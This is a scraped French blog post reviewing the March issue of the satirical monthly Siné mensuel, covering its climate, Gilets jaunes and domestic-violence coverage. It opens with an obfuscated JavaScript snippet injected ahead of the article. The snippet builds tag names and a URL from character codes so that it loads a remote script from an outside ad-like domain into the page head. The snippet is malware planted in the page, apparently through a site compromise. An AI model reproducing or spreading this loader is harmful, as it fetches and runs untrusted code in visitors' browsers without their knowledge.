Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Du bon temps avec Siné mensuel

    Le temps a manqué pour se faire l’écho des derniers numéros de Siné mensuel, depuis la fin de l’année. Des numéros plein de vivacité pourtant et épousant – tout en y puisant – les contours du mouvement des Gilets jaunes. Ceci étant dit, ce Siné mensuel de mars a encore bien la pêche et s’inscrit de nouveau dans l’actualité, climatique cette fois.
    N’opposant donc pas “la fin du mois et la fin du monde“, la bande au regretté Siné fait encore feux de tout bois, derrière un dessin-affiche de couv’ incontestablement marquant du toujours très bon Lacombe, qui réitère sur le sujet avec sa page de dessins mensuelle, en regard d’un bon article de Laure Noualhat sur les collapsologues. La “der” du journal est également intégralement consacré aux enjeux climatiques avec encore quelques beaux dessins métaphoriques, signés Noyau ou Krokus.

    Le reste de l’actualité est également présente, entre les dernières affaires de pédophilie dans l’Eglise (avec une manière radicale d’y mettre fin, signée Faujour) ou les Gilets jaunes. Mais on saluera également deux gros morceaux: une interview de Didier Ruiz sur sa pièce sur les “trans sans clichés” et, surtout un dossier choc sur les violences conjugales signé Léa Gasquet, avec deux reportages très forts, auprès d’une association toulousaine et un groupe de parole masculin dans le Pas-de-Calais.
    Carali dans sa chronique autobiographique “Odeur de brûlé” revient aussi, à sa manière, sur cette question du sexisme à travers un réquisitoire contre les talons hauts, toujours aussi magistralement illustrée.

    Bref, une fois encore, un mix réussi de textes et de dessins, de reportages ou d’enquêtes et de chroniques (Didier Porte, Guillaume Meurice, Nadir Dendoune, un edito signé Jean-Marie Laclavetine cette fois et une réponse limpide et implacable de Michel Warschawski, le correspondant en Israël, à ceux qui veulent pénaliser l’antisionisme). De quoi tenir un mois.

     

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Astérix, une bande dessinée à… écouter ?

    Une “BD audio“. L’idée peut paraître bizarre et le concept laisser perplexe, puisque la ...

    Le dessous des cartes de la colonisation de la Florida

    Florida, Jean Dytar. Editions Delcourt, 264 pages, 27,95 euros. 1572 à Londres. Eleonore et ...

    Spirou, Soviet suprême

     Spirou chez les Soviets, Fred Neidhardt (scénario), Fabrice Tarrin (dessin). Editions Dupuis, 56 pages, ...

    La recherche de l’Orphelin de Perdide s’accélère

    L’Orphelin de Perdide, tome 2: Silbad, Régis Hautière (scénario), Adrian (dessin). Editions Comix Buro ...

    Malgré tout, l’amour à contretemps

     Malgré tout, Jordi Lafebre. Editions Dargaud, 152 pages, 22,50 euros. Arrivés tous deux à ...

    “Charlie Hebdo”, cette fois ça repart vraiment !

    La “une” du nouveau numéro de Charlie Hebdo, qui sort mercredi, est désormais connue. ...